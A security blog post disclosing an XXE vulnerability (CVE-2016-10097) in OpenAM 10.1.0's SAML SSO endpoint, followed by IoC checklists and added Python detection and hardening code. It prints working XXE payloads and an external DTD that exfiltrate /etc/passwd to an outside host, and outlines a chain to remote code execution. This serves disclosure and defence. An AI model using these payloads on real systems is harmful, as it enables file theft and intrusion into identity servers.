CVE-2016-10097, Open AM 10.1.0, XML Injection, XXE, External Entity Resolution, SSO Data Exfiltration, PoC

TL;DR – Open AM 10.1 exploitable via XXE at /SSOPOST/metaAlias/%realm%/idpv2

XML External Entity (XXE) Vulnerability in /SSOPOST/metaAlias/%realm%/idpv2 in OpenAM – Access Management 10.1.0 allows remote attackers to read arbitrary files via the SAMLRequest parameter.

XXE is a means to an RCE Endpoint. XXE provides visibility into the Target System. You may find old JBOSS, PHP, Tomcat, Apache or other goodies that provide instant RCE. 

Comments for Open AM 10.1 SSO Admins: when performing XML Entity Injection against an Application, the HTTP and DNS Requests the parser makes to our external Server are the Correlation Data that positively confirm the Entity was expanded.

XXE will aid in Recon to identify Installed Application(s), gaining a toehold for RCE. Leverage the XXE to perform Recon with LAN Scanning, File System Harvesting and connecting to 127.0.0.1.

Here is a portion of a sample SAML XXE Injection in Open AM 10.1 we reported Feb. 17, 2016 to a Bug Bounty. Our Fuzzing began with:

<!DOCTYPE foo [ <!ENTITY % file SYSTEM "file:///etc/motd">
<!ENTITY % dtd SYSTEM "http://xss.cx/evil1.dtd"> %e1;%foo;%dtd;]>
<saml2p:AuthnRequest AssertionConsumerServiceURL="https://xss.cx?1"
Destination="https://xss.cx?2" ForceAuthn="false" ID=""
IsPassive="false" IssueInstant="2016-02-16T23:54:57.692Z"
ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-GET"
ProviderName="XXX_XXX_A01" Version="2.0"
xmlns:saml2p="urn:oasis:names:tc:SAML:2.0:protocol">
<saml2:Issuer SPProvidedID="XXX_XXX_A01" xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">https://xss.cx?3;</saml2:Issuer>
<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
<ds:SignedInfo>
<ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
<ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
<ds:Reference URI="#"><ds:Transforms>
<ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
<ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
</ds:Transforms>
<ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/>
<ds:DigestValue></ds:DigestValue></ds:Reference>
</ds:SignedInfo>
<ds:SignatureValue></ds:SignatureValue>
<ds:KeyInfo>
<ds:X509Data>
<ds:X509Certificate></ds:X509Certificate>
</ds:X509Data>
<ds:KeyName></ds:KeyName>
</ds:KeyInfo></ds:Signature>
</saml2p:AuthnRequest>

We took the SAML POST from the Report and modified the Injection Signatures; here they are:

BurpSuite Injects: <!DOCTYPE foo [<!ENTITY xxe123 SYSTEM "http://{host}.burpcollaborator.net"> ]>

Manual Check for /etc/passwd : <!DOCTYPE foo [ <!ENTITY % file SYSTEM "file:///etc/passwd"><!ENTITY % dtd SYSTEM "https://xss.cx/evil1.dtd"> %e1;%foo;%dtd;]>

Contents of evil1.dtd: <!ENTITY % p1 SYSTEM "file:///etc/passwd"><!ENTITY % p2 "<!ENTITY e1 SYSTEM 'https://xss.cx/?%p1;'>">%p2;

Results:

[Picture: Sent the /etc/passwd file to our Server via XXE]
[Picture: Using XXE with /etc/passwd in a GET to xss.cx]

Putting the whole picture together, here is the XXE PoC in a Picture we submitted to a Bug Bounty.

NOTE – SAML Editor in the BApp Store will add the SAML Tab in the HTTP Message Editor to make it easy to perform manual XXE Testing
[Picture: Bug Bounty Submission for XXE is worth a Billion Laughs!]
A Picture is Worth a Billion Laughs!

On Twitter, we saw https://twitter.com/mitchmorby/status/700707393768783873.

XXE is a means to an RCE Endpoint.

Let's pull together all the pieces of our Report:
1. Identified an XXE and confirmed its support for Resolution of External Entities
2. Confirmed support for HTTP, DNS, FTP and the usual Protocol Support via XXE
3. Issued HTTP Requests via XXE to our Server, Consuming .dtd files
4. Sent the password file via XXE with a GET to our Server
5. Performed a Local File System Scan via XXE
6. The File Scan then Identified a JBOSS Installation
7. Issued a GET via XXE to our Server containing the .xml configs
8. Used a Web Browser to Access the Web Console once we found the URL in the configs
9. Confirmed RCE via .war file

Comments: There is no Scanner that can perform proper XXE to get the Keys to the Kingdom automagically. XML Injection done properly is all manual. You'll need to update SessionIDs, Cookies and other HTTP Headers. Within the SAML, the XML will contain URIs and custom resources that will need to be massaged by hand. Don't push out a huge signature with a Scanner. Even if you get a Bite on XXE in Burp, you'll need to sit down and do the Exploration and Harvesting by Hand with Burp Repeater and the Command Line; look at the pictures below of what can be Harvested.

XXE IoC's for InfoSec Teams
1. Is your Server Patched and Up To Date?
2. Are you watching Outbound Connections from the XML Parser?

  • Port 21, 22, 23, 80, 443, 8080, 8443?
  • Are there Established Connections from an XML Host?
  • Did you see /etc/passwd in the GET or POST?
  [Picture: HTTP Logfiles showing an XXE GET containing /etc/passwd]

3. Have you disabled External Entity Resolution?

  • Can an Attacker still reference URI's?
    • What about upgrade history Logs?
    [Picture: Logfiles provide juicy details to identify RCE Endpoints, Server Version IDs and more.]
    [Picture: XXE Recon can provide clues to RCE Endpoints. Picture shows JBOSS Web Console recently installed.]
  • Do you allow the XML Parser to Serve your ~root/.bash_history too?
    [Picture: XXE test for ~root/.bash_history]
    [Picture: XXE Check for contents of ~root/.bash_history]
  • Do you know which Directories an Attacker can Read and Exfiltrate via XXE?
    [Picture: External Entity Injection can provide additional Pathways for an Attacker to find an RCE Endpoint]
  • Can an Attacker abuse Protocol Handlers?
    • jar:// too?
    • How about those Windows Help Files?
    • Or find out where else you auth?
    [Picture: Information Exposure via LDAP allows an Attacker to gain insight into your Ops]
    [Picture: .bash_history can provide additional clues to the Keys to the Kingdom]

4. Have you sufficient Permissions on the XML Parser and its UID:GID?

  • To Prevent File System Scanning?
  • To Prevent LAN Scanning?
  • To Prevent connecting to localhost?

5. Have you Programmatically disallowed DNS Lookups from your XML Parser?

  • By modifying the Source

6. Have you recently performed a Manual Engagement with an XML Parser that includes Fuzzing?
(If you've answered 'NO' to these Questions, it's time to look for another Job)
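The outbound-connection and /etc/passwd checks in items 2 and 3 above, turned into a small detector. This is an added example, not code from the original post or from OpenAM: it scans egress-proxy log lines in an assumed format (timestamp, source host, method, URL, status; the host names, the destination allowlist and the log lines are constructed for the example, and attacker.invalid is a placeholder) for an XML-parsing host fetching an external .dtd or sending passwd-shaped data in a query string, and it decodes a POST-binding SAMLRequest value to flag DOCTYPE or ENTITY declarations, which never belong in a legitimate AuthnRequest.

```python
"""Detection checks for XXE callback traffic and DTD-bearing SAML requests.

Added example, not code from the original post or from OpenAM. The log format,
host names, allowlist and log lines below are constructed for the example.
"""
import base64
import binascii
import re
from urllib.parse import unquote, urlsplit

# Assumed inventory: hosts whose XML parser should never reach the internet.
XML_HOSTS = {"openam01.corp.example"}
# Assumed allowlist: the only external destinations those hosts may contact.
ALLOWED_DESTINATIONS = {"idp.partner.example"}

# One line of /etc/passwd looks like "name:x:uid:gid:" once URL-decoded.
PASSWD_LINE = re.compile(r"[A-Za-z_][\w-]*:x:\d+:\d+:")
# Constructs that never belong in a legitimate SAML AuthnRequest.
DTD_MARKERS = re.compile(r"<!DOCTYPE|<!ENTITY", re.IGNORECASE)
# Hypothetical egress-proxy format: "<timestamp> <source host> <method> <url> <status>".
EGRESS_LINE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})$"
)


def check_egress_line(line):
    """Return the reasons an egress-proxy line looks like an XXE callback (empty if none)."""
    m = EGRESS_LINE.match(line.strip())
    if not m or m["src"] not in XML_HOSTS:
        return []
    url = urlsplit(m["url"])
    reasons = []
    if url.hostname not in ALLOWED_DESTINATIONS:
        reasons.append("destination not on allowlist: %s" % url.hostname)
    if url.path.lower().endswith(".dtd"):
        reasons.append("fetches external DTD")
    if PASSWD_LINE.search(unquote(url.query)):
        reasons.append("query string carries /etc/passwd-shaped data")
    return reasons


def scan_egress(log_text):
    """Map each suspicious line of an egress log to its reasons."""
    hits = {}
    for line in log_text.splitlines():
        reasons = check_egress_line(line)
        if reasons:
            hits[line] = reasons
    return hits


def inspect_saml_request(saml_request_b64):
    """Decode a POST-binding SAMLRequest form value and report DTD constructs in it."""
    try:
        xml_text = base64.b64decode(saml_request_b64, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return ["SAMLRequest is not valid base64"]
    found = sorted({t.upper() for t in DTD_MARKERS.findall(xml_text)})
    return ["DTD construct in SAMLRequest: " + t for t in found]


# Constructed egress log: the OpenAM host fetching an external DTD, then sending
# passwd content in a query string; a legitimate partner fetch; and a workstation
# (not an XML host) that is out of scope for this check.
SAMPLE_EGRESS = """\
2016-02-16T23:55:01Z openam01.corp.example GET http://attacker.invalid/evil1.dtd 200
2016-02-16T23:55:02Z openam01.corp.example GET https://attacker.invalid/?root:x:0:0:root:/root:/bin/bash%0Adaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 200
2016-02-16T23:55:03Z openam01.corp.example GET https://idp.partner.example/metadata 200
2016-02-16T23:55:04Z workstation7.corp.example GET http://attacker.invalid/evil1.dtd 200
"""

# Constructed SAMLRequest values as they would arrive in the POST to
# /SSOPOST/metaAlias/<realm>/idpv2 (the POST binding carries plain base64 of the XML).
BENIGN_XML = ('<saml2p:AuthnRequest xmlns:saml2p="urn:oasis:names:tc:SAML:2.0:protocol" '
              'ID="_example1" Version="2.0" IssueInstant="2016-02-16T23:54:57Z"/>')
XXE_XML = ('<!DOCTYPE foo [ <!ENTITY % dtd SYSTEM "http://attacker.invalid/evil1.dtd"> %dtd; ]>'
           + BENIGN_XML)
BENIGN_SAML_REQUEST = base64.b64encode(BENIGN_XML.encode()).decode()
XXE_SAML_REQUEST = base64.b64encode(XXE_XML.encode()).decode()

if __name__ == "__main__":
    for line, reasons in scan_egress(SAMPLE_EGRESS).items():
        print(line.split()[1], "->", "; ".join(reasons))
    print(inspect_saml_request(XXE_SAML_REQUEST))
```

The allowlist check is the one that catches XXE callbacks you have not seen before: an identity server has a short, known list of peers, so any other destination from its XML parser is worth a ticket regardless of what the URL contains. The SAMLRequest check belongs at the reverse proxy or WAF in front of the /SSOPOST endpoint, where the form field is still visible before the parser runs.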

Reading Material
Microsoft XML Parser Versions
GNOME XML Parser

Want to find XXE Bugs? You don't need to Scan; just Browse a Site, find some XML and make a few simple GETs and POSTs. Burp Suite is excellent at finding XXE, but you don't want to leave a large Signature yourself when testing for XXE.

ADDED March 21, 2016 - MS16-035 makes changes to the XML Parser:
External references disabled by default
XPath Transform disabled by default
XSLT Transform disabled by default
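The "external references disabled by default" change above is the same control item 3 of the checklist asks about, applied in the parser. Here it is as an added example in Python's standard library, not code from OpenAM or from the original post: a SAML message never needs a DTD, so the parser rejects any DOCTYPE or entity declaration outright and refuses external entity references, which closes both file disclosure and Billion Laughs expansion in one place. The sample AuthnRequest, the request ID and the attacker.invalid host are constructed placeholders. On the Java stack OpenAM runs on, the equivalent is setting the feature `http://apache.org/xml/features/disallow-doctype-decl` to true on the DocumentBuilderFactory or SAXParserFactory, with `http://xml.org/sax/features/external-general-entities` and `http://xml.org/sax/features/external-parameter-entities` set to false.

```python
"""Parse SAML messages with DTD processing refused outright.

Added example, not code from the original post or from OpenAM; Python standard
library (expat) only. The namespace constant is the SAML 2.0 protocol namespace;
the sample messages are constructed, with attacker.invalid as a placeholder host.
"""
import base64
import xml.parsers.expat as expat

SAML2P = "urn:oasis:names:tc:SAML:2.0:protocol"


class DtdRejected(ValueError):
    """A message carried a DOCTYPE or an entity declaration."""


def parse_saml_message(xml_bytes):
    """Return (root element name, root attributes) for a message without a DTD.

    Element names come back as '<namespace URI> <local name>' because the
    parser is created with a space as its namespace separator.
    """
    parser = expat.ParserCreate(namespace_separator=" ")

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        # Fires at '<!DOCTYPE', before the internal subset is read, so none of
        # the entities in an XXE payload is ever declared or resolved.
        raise DtdRejected("DOCTYPE %r is not allowed in a SAML message" % name)

    def reject_entity_decl(*decl):
        # Defence in depth: also refuses internal entities (Billion Laughs).
        raise DtdRejected("entity declaration is not allowed in a SAML message")

    def refuse_external_entity(context, base, sysid, pubid):
        # Returning 0 tells expat the external entity could not be loaded.
        return 0

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity_decl
    parser.ExternalEntityRefHandler = refuse_external_entity

    root = []

    def on_start(name, attrs):
        if not root:
            root.append((name, dict(attrs)))

    parser.StartElementHandler = on_start
    parser.Parse(xml_bytes, True)  # raises ExpatError on malformed XML
    return root[0]


def check_post_binding(saml_request_b64):
    """Decode the SAMLRequest form field of the HTTP-POST binding and parse it safely.

    Returns ('ok', request ID) or ('rejected', reason); the reason is for the
    server log, not for the response to the sender.
    """
    try:
        xml_bytes = base64.b64decode(saml_request_b64, validate=True)
        name, attrs = parse_saml_message(xml_bytes)
    except DtdRejected as exc:
        return ("rejected", str(exc))
    except (ValueError, expat.ExpatError) as exc:  # binascii.Error is a ValueError
        return ("rejected", "malformed: %s" % exc)
    if name != SAML2P + " AuthnRequest":
        return ("rejected", "unexpected root element %r" % name)
    return ("ok", attrs.get("ID", ""))


def encode_post_binding(xml_text):
    """Encode XML the way the HTTP-POST binding carries it (plain base64, no deflate)."""
    return base64.b64encode(xml_text.encode("utf-8")).decode("ascii")


# Constructed benign AuthnRequest, and the same request prefixed with an XXE-style
# DOCTYPE in the shape of the page's PoC (placeholder attacker host).
BENIGN_XML = ('<saml2p:AuthnRequest xmlns:saml2p="%s" ID="_example1" Version="2.0" '
              'IssueInstant="2016-02-16T23:54:57Z"/>' % SAML2P)
XXE_XML = ('<!DOCTYPE foo [ <!ENTITY % file SYSTEM "file:///etc/passwd">'
           '<!ENTITY % dtd SYSTEM "http://attacker.invalid/evil1.dtd"> %dtd; ]>' + BENIGN_XML)
BENIGN_B64 = encode_post_binding(BENIGN_XML)
XXE_B64 = encode_post_binding(XXE_XML)

if __name__ == "__main__":
    print(check_post_binding(BENIGN_B64))
    print(check_post_binding(XXE_B64))
```

Rejecting the DOCTYPE up front, rather than only refusing to fetch external entities, is the design choice that matters: it leaves nothing for a parser-specific quirk (parameter entities, XInclude, the jar: handler the checklist mentions) to work with, and the log line it produces is itself an IoC for item 2.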


Happy Bug Hunting!

Creativity is the key to Art. A Picture is worth a billion laughs or when combined with the Text can create Artwork then sold to the highest Bidder.